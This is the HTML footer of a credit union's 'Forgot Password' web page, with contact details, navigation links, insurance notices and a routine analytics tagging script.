</nav>

                    </div>
                </div>
                <div class="col-xs-3 text-center">
                    

<p>Connect with SSFCU</p>
<ul class="list-inline">
    <li>
        <a href="https://www.facebook.com/ssfcu" target="">
<img src="https://www.ssfcu.org/-/media/project/common/social/facebook.png?h=33&amp;mh=33&amp;w=33&amp;hash=AA03FA79997B83FF1583AD4E59BF0F50" alt="facebook" width="33" height="33" DisableWebEdit="False" />        </a>
    </li>
    <li>
        <a href="https://www.linkedin.com/company/security-service-federal-credit-union" target="">
<img src="https://www.ssfcu.org/-/media/project/common/social/linkedin.png?h=33&amp;mh=33&amp;w=33&amp;hash=935B2A32226A389CF5FC90FF8295245F" alt="linkedin" width="33" height="33" DisableWebEdit="False" />        </a>
    </li>
    <li>
        <a href="https://twitter.com/ssfcu" target="">
<img src="https://www.ssfcu.org/-/media/project/common/social/twitter.png?h=33&amp;mh=33&amp;w=33&amp;hash=9E4C1001F53C5B10FDD08FE7C16B4AD4" alt="twitter" width="33" height="33" DisableWebEdit="False" />        </a>
    </li>
    <li>
        <a href="https://www.youtube.com/ssfcuservice" target="">
<img src="https://www.ssfcu.org/-/media/project/common/social/youtube.png?h=33&amp;mh=33&amp;w=33&amp;hash=026B4CCCA75F4FB5815C4014A39BDE17" alt="youtube" width="33" height="33" DisableWebEdit="False" />        </a>
    </li>
</ul>
                    

<address>
        <span>
            <strong>Security Service<br/>Corporate Headquarters</strong>
        </span>
        <br />

    15000 W Interstate 10<br/>San Antonio, TX  78249

        <br />
        <span>
            <i class="fa fa-phone"></i> 1.888.415.7878
        </span>

</address>
                </div>
            </div>
        </div>
        <div class="col-xs-12 about-links text-center">
            

    <ul class="nav navbar-nav">
            <li class="">
                <a href="https://www.ssfcu.org/locations" target="" title="Locations">
Locations                </a>
            </li>
            <li class="">
                <a href="https://www.ssfcu.org/loans-and-credit/auto-loans/start-your-search" target="" title="Autos for Sale">
Autos for Sale                </a>
            </li>
            <li class="">
                <a href="https://www.ssfcu.org/about-us" target="" title="About Us">
About Us                </a>
            </li>
            <li class="">
                <a href="https://www.ssfcu.org/careers" target="" title="Careers">
Careers                </a>
            </li>
            <li class="">
                <a href="https://www.ssfcu.org/account-services/member-forms" target="" title="Forms">
Forms                </a>
            </li>
            <li class="">
                <a href="https://www.ssfcu.org/espanol" target="" title="Espa&#241;ol">
Espa&#241;ol                </a>
            </li>
            <li class="">
                <a href="https://www.ssfcu.org/site-map" target="" title="Site Map">
Site Map                </a>
            </li>
    </ul>

        </div>
        <div class="col-xs-12 legal">
            <div class="row">
                <div class="col-md-3 col-xs-6 text-muted">
                    <div class="pull-left ncua">
                        
<img src="https://www.ssfcu.org/-/media/project/website/footer/ncua-icon.png?h=27&amp;mh=27&amp;w=57&amp;hash=C7E4B58748AECC523D9FC88362CC8E1B" class="hidden-sm hidden-xs" alt="ncua-icon" width="57" height="27" DisableWebEdit="False" />  <span>
      FEDERALLY INSURED BY NCUA
  </span>  

                    </div>
                </div>
                <div class="col-md-6 text-center hidden-sm-down">
                    

    <ul class="nav navbar-nav">
            <li class="">
                <a href="https://www.ssfcu.org/security" target="" title="Security">
Security                </a>
            </li>
            <li class="divider-left">
                <a href="https://www.ssfcu.org/account-services/disclosures-and-terms" target="" title="Disclosures">
Disclosures                </a>
            </li>
            <li class="divider-left">
                <a href="https://www.ssfcu.org/account-services/disclosures-and-terms#privacy" target="" title="Online Privacy">
Online Privacy                </a>
            </li>
            <li class="divider-left">
                <a href="https://www.ssfcu.org/security/fraud-and-lost-items" target="" title="Report Fraud">
Report Fraud                </a>
            </li>
            <li class="divider-left">
                <a href="https://www.ssfcu.org/account-services/accessibility-statement" target="" title="Accessibility Statement">
Accessibility Statement                </a>
            </li>
    </ul>

                </div>
                <div class="col-md-3 col-xs-6 text-muted">
                    <div class="pull-right housing">
                        
<img src="https://www.ssfcu.org/-/media/project/website/footer/equal-housing-icon.png?h=27&amp;mh=27&amp;w=35&amp;hash=23105FFF7C754460578BD3E4D06D7A56" class="hidden-sm hidden-xs" alt="equal-housing-icon" width="35" height="27" DisableWebEdit="False" />  <span>
      EQUAL HOUSING LENDER
  </span>  

                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="row hidden-md-up">
        <div class="col-xs-12 text-center mobile-logo">
            


<a href="https://www.ssfcu.org/">
    <img src="https://www.ssfcu.org/-/media/project/website/ssfcu-logo.svg?h=34&amp;mh=50&amp;w=265&amp;hash=178E505B4D143EC19CF2AA8FEFC56172" class="img-responsive" alt="Security Service Federal Credit Union home" width="265" height="34" />
</a>

        </div>
        <div class="col-xs-12 text-center">
            
<span>Routing Number: <strong>314088637</strong></span>

        </div>
        <div class="col-xs-12 text-center">
            <span class="ncua">
<img src="https://www.ssfcu.org/-/media/project/website/footer/ncua-icon.png?h=27&amp;mh=27&amp;w=57&amp;hash=C7E4B58748AECC523D9FC88362CC8E1B" class="hidden-sm hidden-xs" alt="ncua-icon" width="57" height="27" DisableWebEdit="False" />  <span>
      FEDERALLY INSURED BY NCUA
  </span>  
.</span>
            &nbsp;
            <span class="housing">
<img src="https://www.ssfcu.org/-/media/project/website/footer/equal-housing-icon.png?h=27&amp;mh=27&amp;w=35&amp;hash=23105FFF7C754460578BD3E4D06D7A56" class="hidden-sm hidden-xs" alt="equal-housing-icon" width="35" height="27" DisableWebEdit="False" />  <span>
      EQUAL HOUSING LENDER
  </span>  
.</span>
        </div>
    </div>
    <div class="row">
        <div class="col-xs-12 text-center">
            
<p class="form-control-static">
  Copyright &copy; <span id="copyright-date">2017</span> <a href="https://www.ssfcu.org/">Security Service Federal Credit Union.</a>
</p>
        </div>
    </div>
</div>

        </footer>

        
    </div>
    
    

                <script>
                    var ssfcuThemeId = '';
                    var ssfcuSegment = 'Anonymous';
                </script>
            <script type="text/javascript">
                digitalData.Tag = {
  'version': '1.0',
  'pageInstanceID': 'prod',
  'page': {
    'pageInfo': {
      'pageName': 'Access: Forgot Password',
      'destinationURL': document.URL,
      'referringURL': document.referrer,
    },
    'category': {
      'primaryCategory': 'Access',
      'secondaryCategory': '',
      'tertiaryCategory': '',
      'pageType': 'Content',
      'siteType': 'myBranch'
    },
    'segment': {
    'siteType': 'myBranch'
    },
    'site': {
      'fullDomain': document.location.origin
    },
    'theme': {
      'themeid': ssfcuThemeId
    },
    'user': {
      'segment': ssfcuSegment
    },
  },
'ModalWindow':{
    'windowTitle': ''
    },
}                
            </script>
            <script type="text/javascript">
            _satellite.pageBottom();
            </script>


    
        <!-- (Assembly File Version: 1.2.0.0, Computer: PW6, Client IP: 23.235.227.106, Time: 7/6/2020 9:14:53 AM) -->

</body>
</html>